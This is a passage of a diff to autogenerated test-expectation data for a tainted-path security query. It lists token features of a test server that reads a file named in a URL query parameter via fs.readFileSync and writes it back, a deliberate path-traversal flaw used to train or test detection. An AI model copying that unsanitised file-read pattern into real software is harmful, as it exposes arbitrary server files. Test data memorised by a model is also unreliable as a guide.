autogenerated/TaintedPath/typescript.ts:18:26:18:37 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:18:26:18:37 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:18:26:18:37 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:18:26:18:37 | readFileSync | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:18:39:18:43 | path2 | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/typescript.ts:18:39:18:43 | path2 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:18:39:18:43 | path2 | calleeImports | fs | @@ -11714,6 +89027,81 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:18:39:18:43 | path2 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:18:39:18:43 | path2 | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:18:39:18:43 | path2 | receiverName | fs | +| autogenerated/TaintedPath/typescript.ts:20:7:20:11 | path3 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:20:7:20:11 | path3 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:20:7:20:11 | path3 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:20:7:20:11 | path3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:20:7:20:11 | path3 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:20:7:20:18 | path3 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:20:7:20:18 | path3 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:20:7:20:18 | path3 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:20:7:20:18 | path3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:20:7:20:18 | path3 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:20:7:20:18 | path3 = path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:20:7:20:18 | path3 = path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:20:7:20:18 | path3 = path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:20:7:20:18 | path3 = path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:20:7:20:18 | path3 = path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:20:15:20:18 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:20:15:20:18 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:20:15:20:18 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:20:15:20:18 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:20:15:20:18 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:21:3:21:7 | path3 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:21:3:21:7 | path3 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:21:3:21:7 | path3 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:21:3:21:7 | path3 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:21:3:21:7 | path3 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:21:3:21:7 | path3 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:21:3:21:7 | path3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:21:3:21:7 | path3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:21:3:21:7 | path3 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:21:3:21:7 | path3 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:21:3:21:45 | path3 & ... path3)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:21:3:21:45 | path3 & ... path3)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:21:3:21:45 | path3 & ... path3)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:21:3:21:45 | path3 & ... path3)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:21:3:21:45 | path3 & ... path3)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:21:13:21:15 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:21:13:21:15 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:21:13:21:15 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:21:13:21:15 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:21:13:21:15 | res | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:21:13:21:21 | res.write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:21:13:21:21 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:21:13:21:21 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:21:13:21:21 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:21:13:21:21 | res.write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:21:13:21:45 | exceptional return of res.wri ... path3)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:21:13:21:45 | exceptional return of res.wri ... path3)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:21:13:21:45 | exceptional return of res.wri ... path3)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:21:13:21:45 | exceptional return of res.wri ... path3)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:21:13:21:45 | exceptional return of res.wri ... path3)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:21:13:21:45 | res.wri ... path3)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:21:13:21:45 | res.wri ... path3)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:21:13:21:45 | res.wri ... path3)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:21:13:21:45 | res.wri ... path3)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:21:13:21:45 | res.wri ... path3)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:21:17:21:21 | write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:21:17:21:21 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:21:17:21:21 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:21:17:21:21 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:21:17:21:21 | write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:21:23:21:24 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:21:23:21:24 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:21:23:21:24 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:21:23:21:24 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:21:23:21:24 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:21:23:21:37 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:21:23:21:37 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:21:23:21:37 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:21:23:21:37 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:21:23:21:37 | fs.readFileSync | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:21:23:21:44 | exceptional return of fs.read ... (path3) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:21:23:21:44 | exceptional return of fs.read ... (path3) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:21:23:21:44 | exceptional return of fs.read ... (path3) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:21:23:21:44 | exceptional return of fs.read ... (path3) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:21:23:21:44 | exceptional return of fs.read ... (path3) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:21:23:21:44 | fs.read ... (path3) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/typescript.ts:21:23:21:44 | fs.read ... (path3) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:21:23:21:44 | fs.read ... (path3) | contextFunctionInterfaces | | @@ -11722,6 +89110,11 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:21:23:21:44 | fs.read ... (path3) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:21:23:21:44 | fs.read ... (path3) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:21:23:21:44 | fs.read ... (path3) | receiverName | res | +| autogenerated/TaintedPath/typescript.ts:21:26:21:37 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:21:26:21:37 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:21:26:21:37 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:21:26:21:37 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:21:26:21:37 | readFileSync | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:21:39:21:43 | path3 | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/typescript.ts:21:39:21:43 | path3 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:21:39:21:43 | path3 | calleeImports | fs | @@ -11731,6 +89124,76 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:21:39:21:43 | path3 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:21:39:21:43 | path3 | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:21:39:21:43 | path3 | receiverName | fs | +| autogenerated/TaintedPath/typescript.ts:23:7:23:11 | path4 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:23:7:23:11 | path4 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:23:7:23:11 | path4 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:23:7:23:11 | path4 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:23:7:23:11 | path4 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:23:7:23:18 | path4 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:23:7:23:18 | path4 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:23:7:23:18 | path4 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:23:7:23:18 | path4 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:23:7:23:18 | path4 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:23:7:23:18 | path4 = path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:23:7:23:18 | path4 = path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:23:7:23:18 | path4 = path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:23:7:23:18 | path4 = path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:23:7:23:18 | path4 = path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:23:15:23:18 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:23:15:23:18 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:23:15:23:18 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:23:15:23:18 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:23:15:23:18 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:24:3:24:7 | path4 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:24:3:24:7 | path4 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:24:3:24:7 | path4 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:24:3:24:7 | path4 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:24:3:24:7 | path4 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:24:3:24:45 | path4 ? ... path4)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:24:3:24:45 | path4 ? ... path4)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:24:3:24:45 | path4 ? ... path4)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:24:3:24:45 | path4 ? ... path4)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:24:3:24:45 | path4 ? ... path4)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:24:13:24:15 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:24:13:24:15 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:24:13:24:15 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:24:13:24:15 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:24:13:24:15 | res | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:24:13:24:21 | res.write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:24:13:24:21 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:24:13:24:21 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:24:13:24:21 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:24:13:24:21 | res.write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:24:13:24:45 | exceptional return of res.wri ... path4)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:24:13:24:45 | exceptional return of res.wri ... path4)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:24:13:24:45 | exceptional return of res.wri ... path4)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:24:13:24:45 | exceptional return of res.wri ... path4)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:24:13:24:45 | exceptional return of res.wri ... path4)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:24:13:24:45 | res.wri ... path4)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:24:13:24:45 | res.wri ... path4)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:24:13:24:45 | res.wri ... path4)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:24:13:24:45 | res.wri ... path4)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:24:13:24:45 | res.wri ... path4)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:24:17:24:21 | write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:24:17:24:21 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:24:17:24:21 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:24:17:24:21 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:24:17:24:21 | write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:24:23:24:24 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:24:23:24:24 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:24:23:24:24 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:24:23:24:24 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:24:23:24:24 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:24:23:24:37 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:24:23:24:37 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:24:23:24:37 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:24:23:24:37 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:24:23:24:37 | fs.readFileSync | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:24:23:24:44 | exceptional return of fs.read ... (path4) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:24:23:24:44 | exceptional return of fs.read ... (path4) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:24:23:24:44 | exceptional return of fs.read ... (path4) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:24:23:24:44 | exceptional return of fs.read ... (path4) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:24:23:24:44 | exceptional return of fs.read ... (path4) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:24:23:24:44 | fs.read ... (path4) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/typescript.ts:24:23:24:44 | fs.read ... (path4) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:24:23:24:44 | fs.read ... (path4) | contextFunctionInterfaces | | @@ -11739,6 +89202,11 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:24:23:24:44 | fs.read ... (path4) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:24:23:24:44 | fs.read ... (path4) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:24:23:24:44 | fs.read ... (path4) | receiverName | res | +| autogenerated/TaintedPath/typescript.ts:24:26:24:37 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:24:26:24:37 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:24:26:24:37 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:24:26:24:37 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:24:26:24:37 | readFileSync | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:24:39:24:43 | path4 | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/typescript.ts:24:39:24:43 | path4 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:24:39:24:43 | path4 | calleeImports | fs | @@ -11748,6 +89216,96 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:24:39:24:43 | path4 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:24:39:24:43 | path4 | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:24:39:24:43 | path4 | receiverName | fs | +| autogenerated/TaintedPath/typescript.ts:26:7:26:11 | path5 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:26:7:26:11 | path5 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:26:7:26:11 | path5 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 